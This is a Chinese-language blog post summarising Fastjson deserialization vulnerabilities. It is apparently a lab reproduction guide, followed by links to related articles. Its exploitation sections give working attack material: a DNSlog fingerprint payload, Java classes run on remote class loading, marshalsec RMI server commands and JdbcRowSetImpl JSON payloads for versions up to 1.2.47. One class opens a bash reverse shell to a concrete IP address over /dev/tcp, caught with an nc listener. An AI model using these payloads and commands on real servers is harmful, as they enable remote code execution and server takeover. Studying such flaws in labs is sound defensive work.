Fastjson漏洞总结

已于 2023-07-12 16:28:44 修改
阅读量969 收藏 1
点赞数 1
文章标签: json web安全
于 2023-07-12 15:25:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46622976/article/details/131682085
版权

目录

前言

Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。

指纹识别

fastjson指纹识别

如果有报错回显,可以故意构造不完整json请求,返回的数据包会进行报错。
发送内容最后少了个括号导致数据包不完整从而报错,从返回的数据包中可以看到有fastjson字样。
在这里插入图片描述

如果没有报错回显,利用dnslog进行回显
{“zeo”:{“@type”:“java.net.Inet4Address”,“val”:“dnslog的地址”}}

在这里插入图片描述
在这里插入图片描述

Fastjson<1.2.24远程代码执行(CNVD-2017-02833 )

漏洞详情

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

漏洞版本

fastjson <=1.2.24

漏洞分析

http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

漏洞利用

1、访问存在漏洞的页面,得到json格式的数据。
在这里插入图片描述
2、创建TouchFile.java文件,内容如下:

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

3、执行编译命令javac TouchFile.java,得到TouchFile.class文件。并将其通过python3 -m http.server命令放到外网环境中,默认监听端口8000。
在这里插入图片描述
4、然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://xx.xx.xx.xx:8000/#TouchFile" 9999

在这里插入图片描述
5、在漏洞页面bp抓包后post提交数据,替换如下payload:

POST / HTTP/1.1
Host: 靶机ip:端口
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)
Connection: close
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip, deflate
 
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://xx.xx.xx.xx:9999/TouchFile",
        "autoCommit":true
    }
}

6、靶机执行命令成功
在这里插入图片描述

Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)

漏洞详情

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

影响版本

fastjson <1.2.48

漏洞分析

https://www.anquanke.com/post/id/181874

漏洞利用

1、编写一个反弹shell脚本Exploit.java,并编译生成Exploit.class。

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/98.126.219.155/58274 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

2、然后将编译好的上传到服务器,利用python3 -m http.server 开启http服务。然后能够访问即可:
在这里插入图片描述
3、借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://39.108.118.128:8000/#Exploit" 9999

4、接着开启nc监听端口4444:nc -lvvp 4444

5、向靶场服务器发送Payload:

POST / HTTP/1.1
Host: xx.xx.xx.xx:8090
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)
Connection: close
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip, deflate
 
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://xx.xx.xx.xx:9999/Exploit",
        "autoCommit":true
    }
}

在这里插入图片描述
6、反弹成功

Fstjson < 1.2.60 远程拒绝服务漏洞

漏洞描述

Fastjson多个版本存在远程拒绝服务漏洞,Fastjson 1.2.60版本以下存在字符串解析异常,可导致远程拒绝服务攻击。攻击者即可通过精心构造的请求包对使用Fastjson的服务器造成远程拒绝服务攻击,可导致服务器宕机。

漏洞分析

影响版本

fastjson <1.2.60

fastjson sec版本>=sec06

漏洞利用

Fastjson <=1.2.68 全版本远程代码执行漏洞

漏洞详情

FastJSON <= 1.2.68 存在远程代码执行漏洞,可直接获取到服务器权限。漏洞成因是Fastjson autotype开关的限制可被绕过,然后链式地反序列化某些原本不能被反序列化的有安全风险的类。

影响版本

FastJSON <= 1.2.68

漏洞分析

https://www.cnblogs.com/tr1ple/p/12348886.html

https://www.cnblogs.com/ph4nt0mer/p/13065373.html

https://xz.aliyun.com/t/7878

漏洞利用

暂无

306Safe
关注
fastjson 1.22-1.24 TemplatesImpl反序列化漏洞分析
Vicl1fe的博客
07-09 761
前言 看了别人的文章,我也打算先分析TemplatesImpl利用链,关于fastjson的使用可以参考:fastjson 使用 环境 jdk 1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version> </dependency&
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2318
Fastjson组件反序列化分析,从基础到RCE的过程笔记
Fastjson 爆出远程代码执行高危漏洞
金溪的博客
03-23 4239
fastjson近日曝出代码执行漏洞,恶意用户可利用此漏洞进行远程代码执行,入侵服务器,漏洞评级为“高危”。基本介绍fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。漏洞介绍fastjson1.2.24以及之前版本近日曝出代码执行漏洞,当用户提交一个精心构造的恶意的序列化数据到服务器端时,fastjson在反序列化时存在漏洞,可导致远程...
Fastjson漏洞
qq_50854662的博客
10-09 5847
Fastjson漏洞
代码审计-Fastjson各版本漏洞分析(上)
dzqxwzoe的博客
08-03 1730
最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了。
Fastjson漏洞原理分析
LTianHang的博客
06-04 5337
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
FastJson 漏洞.md
05-27
#### 二、Fastjson漏洞概述 Fastjson在多个版本中存在安全漏洞,主要集中在反序列化过程中,这些漏洞可能允许远程代码执行(RCE),即攻击者可以通过构造恶意的JSON数据来触发漏洞,进而执行任意代码。此类漏洞一旦...
fastjson漏洞导致服务瘫痪,先别忙升级
zxiaofan.com
10-13 2044
1、背景   2019年9月5日,fastjson修复了当字符串中包含\x转义字符时可能引发OOM的问题。建议广大用户升级fastjson版本至少到1.2.60。  一个bug这么恐怖,竟然直接OOM,亲身体验下吧。测试代码如下: JSON.parse("[{\"a\":\"a\\x]"); 实验效果:4分钟 堆内存 占用上升达2G;  &em...
Fastjson漏洞的识别与DNSlog回显
tpaer的博客
09-02 5100
Fastjson RCE漏洞实战POC探测方式
从源码看Log4j2、FastJson漏洞
wdj_yyds的博客
12-31 4573
前言 远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器的CPU不得美滋滋了。 前段时间,Java 界的知名日志框架 Log4j2 发现了远程代码执行漏洞漏洞风暴席卷各大公司,编程届异常火热(加班),我们是万万没想到那么牛逼的日志框架有BUG。 这次安全漏洞也有个小插曲,我司的员工发现了漏洞,上报了Apache没告知GXB,我司也受到了处罚,希望下次引以为戒,不过这事程序员不背锅,管理下次
Fastjson历史漏洞分析
hldfight
04-07 1779
0x00 初识Fastjson 前段时间分析了一下Fastjson的历史漏洞,在这里做下记录。 为了方便切换Fastjson的版本,我用idea新建了一个maven项目,在pom.xml中引入Fastjson: <dependencies> <dependency> <groupId>com.alibaba</gro...
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2501
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 3101
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
fastjson又被发现漏洞,这次危害可导致服务瘫痪!
朱小厮的博客
09-07 321
点击上方“朱小厮的博客”,选择“设为星标”回复”1024“获取独家整理的学习资料来源:https://tinyurl.com/y53yanrw0x00 漏洞背景2019年...
Fastjson历史反序列漏洞分析(1.2.24-1.2.80)
dreamthe的博客
08-10 6091
本文章总结fastjson1.2.24到1.2.80所产生的反序列化漏洞,将其进行分析。希望多大家有帮助。
Fastjson高危漏洞!附解决方法(实战)
langshen1314的专栏
06-17 759
Fastjson
Fastjson历史漏洞复现
懂进攻知防守
07-27 1476
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
最新发布
人若无名,便可专心练剑
03-27 4523
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Fastjson反序列化高危漏洞系列-part1:1.2.x — 1.2.47
mole_exp的博客
12-09 3563
文章目录前言1、Fastjson的序列化和反序列化1.1 fastjson序列化1.2 fastjson反序列化1.2.1 fastjson反序列化漏洞原理1.2.2 fastjson反序列化漏洞Demo2、Fastjson <= 1.2.242.1 利用链 - TemplatesImpl2.1.1 限制条件2.1.2 构造PoC问题1:为什么_bytecodes中的字节码要经过base64编码问题2:恶意类为什么要继承AbstractTranslet类问题3:fastjson为什么认为_output
fastjson漏洞
07-27
如果你想复现FastJSON漏洞,可以进入Docker容器进行操作。首先,使用命令"cd 1.2.47-rce/docker-compose up -d"进入Docker容器。然后,通过抓包的方式确认是否使用了FastJSON框架,并通过修改请求包来判断是否是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

306Safe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值